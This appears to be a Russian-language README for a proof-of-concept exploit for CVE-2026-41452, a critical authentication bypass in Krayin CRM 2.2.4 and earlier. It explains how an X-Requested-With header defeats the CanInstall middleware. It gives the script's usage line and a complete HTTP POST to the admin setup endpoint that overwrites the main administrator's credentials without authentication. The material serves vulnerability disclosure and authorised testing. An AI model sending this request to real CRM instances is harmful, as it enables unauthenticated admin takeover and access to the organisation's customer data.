
Эксплойт proof-of-concept для CVE-2026-41452 — критического обхода аутентификации в Krayin CRM <= 2.2.4, позволяющего неаутентифицированный захват учётной записи администратора через обход middleware.
Доказательство концепции (PoC), демонстрирующее критическую уязвимость отсутствия аутентификации (CVE-2026-41452), затрагивающую Krayin CRM версии 2.2.4 и более ранние.
Эта уязвимость позволяет неаутентифицированным удалённым злоумышленникам обойти логику middleware установки приложения (CanInstall) путём внедрения определённых HTTP-заголовков, что приводит к полной перезаписи конфигурации основной учётной записи администратора.
[!WARNING]
Отказ от ответственности: Этот репозиторий и содержащаяся в нём информация предоставлены строго в образовательных целях, для исследований в области безопасности и авторизованного защитного аудита. Неавторизованное тестирование или эксплуатация компьютерных систем строго незаконны. Автор не несёт ответственности за любое неправомерное использование данного материала.
CVE ID: CVE-2026-41452
Тип уязвимости: Отсутствие аутентификации / Обход middleware
Критичность: Критическая (CVSS 9.8)
Затронутое ПО: Krayin CRM <= 2.2.4
Исправленная версия: Krayin CRM >= 2.2.5
Уязвимость находится в middleware настройки приложения. Неаутентифицированный злоумышленник может добавить заголовок X-Requested-With: XMLHttpRequest к специально сформированному запросу, нацеленному на эндпоинт /install/api/admin-config-setup. Это подавляет ожидаемую проверку перенаправления в middleware CanInstall, открывая неаутентифицированную операцию базы данных updateOrInsert, которая нацелена на жёстко заданный ID (1) основного системного администратора.
Запустите скрипт против целевого экземпляра, который вы уполномочены тестировать:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
Под капотом обход срабатывает через следующую структуру HTTP-транзакции:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123